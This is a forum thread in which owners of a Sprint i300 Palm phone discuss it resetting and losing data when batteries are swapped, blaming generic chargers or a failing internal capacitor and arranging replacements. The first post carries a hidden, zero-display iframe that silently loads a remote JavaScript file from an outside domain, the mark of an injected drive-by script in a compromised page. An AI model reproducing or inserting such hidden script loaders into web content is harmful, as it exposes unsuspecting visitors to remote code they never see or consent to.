+ Reply to Thread
Results 1 to 13 of 13
  1. #1
    Registered User
    Join Date
    10-31-2003
    Location
    Jax, FL
    Posts
    7

    Question resets when battery's replaced

    Recently, everytime I change out my dying battery for a freshly charged one, my phone resets itself, causing me to lose all apps/downloads, such that I have to sync it to re-install everything (phone/address books, etc.)

    Any ideas? Should I take it in for a replacement?

    Thanks, as always.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Distinctive since 1978

  2. #2
    Registered User davi's Avatar
    Join Date
    07-22-2002
    Posts
    58
    Go get a new one if it's stilll under warranty. By the way, do you use generic car chargers?

    Believe it or not, i used to have a problem where the phoen woudl RANDOMLY reset sometimes.

    When I was in Laredo, TX (visiting), the ONE and ONLY tech/repair guy at the Sprint store there told me "Does it reset when you change the batteries? Because it's supposed to do that"

    I wanted to throw my phone at him.

    And all the reps there were high school females that didn't even know what an i300 was....this was one year ago.

  3. #3
    Registered User
    Join Date
    10-31-2003
    Location
    Jax, FL
    Posts
    7
    davi, thanks for your reply. Yes, I do have a generic car charger. Could that be the problem? That "Sprint Tech" can't possibly know what he's talking about, because if the phone was meant to reset every time, what would be the convenience in having an extra battery charger-slot on the cradle? Anyway, I'm pretty frustrated. I had diagnostics run on it in the Sprint store in Dallas last week, and "it passed with flying colors." Oddly enough, my roommate's "new" refurb'd phone did the same thing the last time he changed batteries.

    I wonder if it has anything to do with the hacks, or other apps downloaded to it.
    Distinctive since 1978

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    you uhave an internal capacitor that keeps tghe memory when you swicth batteries or if the main battery dies...

    the fault is more than likely in this capacitor.. it may be time for a new phone. you can simply replace this part; it is not a cr2302 battery or coin battery.

    could be that your aftermaket charger is not doing its job or it could be overcharging the batteries...

  5. #5
    Registered User
    Join Date
    12-16-2002
    Location
    Clearwater FL
    Posts
    57
    Have you resolved your problem?

    The same has happened to me several times when I have been on a trip.

    This issue does not arise after every battery change, but again once in awhile, after changing a battery ( same change routine everytime and I do carry daily 3 batteries) everything is lost.

    All my equipment for the unit is OEM only.

    Like to know your results since it maybe the same issue with mine which is under that wonderful insurance program for replacement.

  6. #6
    Registered User
    Join Date
    03-16-2004
    Posts
    2
    I have the same problem with my phone when I swap out the batteries and Sprint told me it was the charger so they gave me a new one but the problem is the same so I don't think it's the charger. I'm going to try and have the phone replaced, perhaps with a different model since this is the second i300 phone I have had with this problem. Is there anyone out there that swaps batteries out successfully?

  7. #7
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    the problem is most likely the internal capacitor is faulty. a replacement is in order.

  8. #8
    Registered User
    Join Date
    12-14-2003
    Location
    sf,ca
    Posts
    3
    this is the first time this has happened to me when swapping out my batteries (which i only charge in the original manufacturer's cradle, that i've had since jan2001)
    -- i switched batteries, turned on, and when i went to turn on the phone function, half of the screen was covered with this alert:

    "Fatal Alert" (on blue heading bar)
    "Fatal Exception" (in white screen, under heading)
    "Reset" (as button on screen)

    i'm embarrassed to say how long it has been since i've hotsynced -- and am afraid to reset and lose all my data!
    is there any other hope? will a soft reset work? i'm afraid to do anything right now.

    i've emailed marctronixx, but if anyone else can help, i'd really appreciate it!
    PLEASE!

  9. #9
    Registered User
    Join Date
    12-14-2003
    Location
    sf,ca
    Posts
    3
    oops. guess i've had phone since jan2002 (seeing that first models came out in oct2001)

  10. #10
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    linn, how is everything going?

  11. #11
    Registered User
    Join Date
    12-16-2002
    Location
    Clearwater FL
    Posts
    57
    Thank you for the update. Just contacted Sprint and under the insurance program they will charge $10 and ship a replacement in 3 days.
    They first requested that I take this to the local store. My reply was that since this does not happen on every battery replacement, I did not want to take that route but to use the phone-in replacement as indicated in the updated July 15, 2004 plan. With out anyother question, the replacement order was placed.

  12. #12
    Registered User
    Join Date
    12-14-2003
    Location
    sf,ca
    Posts
    3
    good morning marctronixx,
    i haven't done anything since last night...had spent so much time agonizing about it in the afternoon, and got behind on everything else...

    i'm assuming a "warm reset" is the same as a "soft reset"...i did a little research in the forum, and got nervous when i saw that someone tried a "warm reset" and it actually did erase everything...so...i called sprint, and he recommended that i bring to store for a technician to advise me...

    we'll see what happens after 1pm pacific time today

    thanks again for your help, i'll let you know what happens.

  13. #13
    Registered User
    Join Date
    12-16-2002
    Location
    Clearwater FL
    Posts
    57
    Just received my phone from Sprint on the replacement service done over the phone as indicated on 11/22.

    They sent me a i500 to my surprise.

    Now I have to find out how to sync with a different name and still load all my other programs that are registered to the name used on my i300.

    Got a quick answer on a step by step how to do this. First the i500 operating 4.1 palm then how to get my programs to load?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts